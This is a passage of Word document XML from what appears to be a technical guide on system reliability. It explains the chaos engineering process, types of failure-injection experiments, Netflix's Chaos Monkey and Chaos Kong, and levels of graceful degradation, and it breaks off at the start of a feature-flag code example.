    <w:p w14:paraId="0ED042F9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="477"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Neither captures the emergent behavior of production systems under partial failure conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A6043A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="477"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Production has: noisy neighbors, network jitter, clock skew, resource contention, GC pauses — all simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FD00A3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 The Chaos Engineering Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0E1F57" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="478"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Define steady state:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> What does "normal" look like? (e.g., p99 latency &lt; 200ms, error rate &lt; 0.1%, throughput &gt; 10,000 RPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD53A4E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="478"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hypothesize:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> "If we kill one instance of Service X, the system will continue meeting steady-state invariants."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012A72D2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="478"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inject failure:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Kill the instance (or inject latency, corrupt responses, partition the network).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54838368" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="478"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observe:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Did the system maintain steady state?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5455118F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="478"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Learn:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> If not — why? What needs to be fixed?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8F8C04" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.3 Types of Chaos Experiments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FB52F7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Infrastructure-level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAA9B95" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Kill a random VM/container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1F7266" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Fill a disk to 100%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0074BA01" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Consume all CPU on a host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19107116" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Introduce 500ms network latency between AZs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CF1FBA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Drop 10% of packets between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7300F387" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Partition a database replica from its primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B7925" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Terminate an entire AZ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB33C4F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1D8190" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="480"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Return errors from a dependency (fault injection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29002324" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="480"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Slow down a dependency's responses (latency injection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0550EDE7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="480"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Corrupt response payloads from a service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC377E2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="480"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Exhaust thread pools/connection pools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DADF16" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="480"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Trigger garbage collection pauses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AD1B7F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Operational-level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00049C13" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="481"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Revoke a certificate mid-operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE43C93" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="481"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Roll back a deployment during canary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF4ABAC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="481"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Simulate clock skew between nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6AA5C5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="481"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Exhaust DNS resolution (make DNS queries fail).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6670EC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.4 Netflix's Chaos Monkey and Beyond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6106FF66" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chaos Monkey (original):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6480DAF2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="482"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Randomly kills production EC2 instances during business hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5C6F86" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="482"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Engineers KNOW their instances will be killed → design for it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2F39F3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="482"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If a service can't survive instance loss, it's discovered quickly (not during a real outage at 3 AM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCF0A0C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chaos Kong:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC1686A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="483"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Simulates an entire AWS region failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CFA697" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="483"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>All traffic is evacuated from one region to verify the other regions can handle the full load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7136C0E6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="483"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Validates cross-region failover works end-to-end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9333C9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Principles for safe chaos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16368628" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="484"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start small:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> First kill one instance. Then one AZ. Then one region. Escalate gradually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C561BB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="484"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Minimize blast radius:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Run experiments on a small percentage of traffic first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63431B6C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="484"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Have a kill switch:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Ability to instantly stop the experiment if things go worse than expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207FEBEF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="484"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Run in production:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Staging environments don't have the same load patterns, data, or emergent behaviors. Reliability is proven in production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668AE04D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="484"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automate:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Continuous chaos (always running, always verifying) is better than quarterly game days.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CBD7D0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="084BCCEC">
          <v:rect id="_x0000_i2941" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2351B4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Graceful Degradation — Reliability Under Extreme Conditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49024C11" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.1 The Spectrum of Service Quality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782D14AB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Rather than binary "working/broken," design a spectrum:</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87"/>
        <w:gridCol w:w="2541"/>
        <w:gridCol w:w="4822"/>
      </w:tblGrid>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="5C1D549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7EE4EC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Level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2114DD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description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2A481C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="2146EFB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439081" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Full functionality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0B88AA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Everything works perfectly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86DFDE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Complete product page with recommendations, reviews, personalization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="5ED153B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67DFF5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Reduced features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07799E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Non-critical features disabled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D18467" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Product page without recommendations (recommendation service down)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="79D5928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8637EE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Core only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1C56C3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Only essential functions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39649D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Can browse and purchase, but no search (search service down)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="43D1CA9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644248" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Static fallback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4F7ED3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Serve cached/static content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C1471B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Show last-known product catalog from CDN cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="49BB660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55353A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:lastRenderedPageBreak/>
              <w:t>Maintenance page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E7EB60" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Graceful "we're working on it"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3DC500" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Informative error page with estimated recovery time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="007D319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46940E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Hard failure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AAB1AD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Uncontrolled failure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6F3CD4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Connection refused, timeout, cryptic error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DE50809" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Never reach "hard failure." Degrade gracefully through the levels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3672345B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.2 Implementation Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564F4DCA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Feature flags with fallback values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B682A35" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Each non-critical feature is behind a flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2627F558" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FBEC63" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>if (featureFlags.isEnabled("recommendations") &amp;&amp; recommendationService.isHealthy()) {</w:t>
      </w:r>
    </w:p>
